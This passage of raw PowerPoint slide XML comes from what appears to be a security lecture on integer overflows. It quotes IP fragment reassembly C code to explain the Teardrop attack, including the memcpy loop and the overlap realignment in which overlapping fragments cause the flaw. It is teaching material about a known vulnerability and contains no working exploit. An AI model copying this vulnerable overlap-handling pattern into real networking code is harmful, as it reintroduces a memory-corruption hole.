              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>fp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>qp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>-&gt;fragments;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>while(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>fp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> != NULL) {</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  if(count + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>fp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>len</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>skb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>len</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>    {</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>error_too_big</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>;} /* We don’t want a ping of death :) */</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>memcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>((</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>ptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>fp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>-&gt;offset), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>fp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>ptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>fp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>len</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  count += </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>fp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>len</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>fp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>fp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>-&gt;next;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>How is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>fp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>len</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>computed?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="49223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8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8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82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82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824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82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r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Integer Overflows: Teardrop</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="140291" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Computes the positioning of the fragment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>end = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>fp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>-&gt;offset + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>ntohs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>fp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>iph</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>tot_len</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>) – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>fp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>ihl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>If there are overlapping fragments, realigns</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Courier New" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>if (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>fp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>prev</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> != NULL &amp;&amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>fp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>-&gt;offset &lt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>fp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>prev</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>-&gt;end) {</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>overlap = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>fp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>prev</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>-&gt;end – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>fp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>-&gt;offset; /* size of the overlap */</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>	offset += overlap; /* increment </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>ptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> into datagram */</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>fp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>ptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> += overlap; /* increment </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>ptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> into fragment data */ }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Initializes the fragment data structure</a:t>
            </a:r>
          </a:p>
          <a:p>
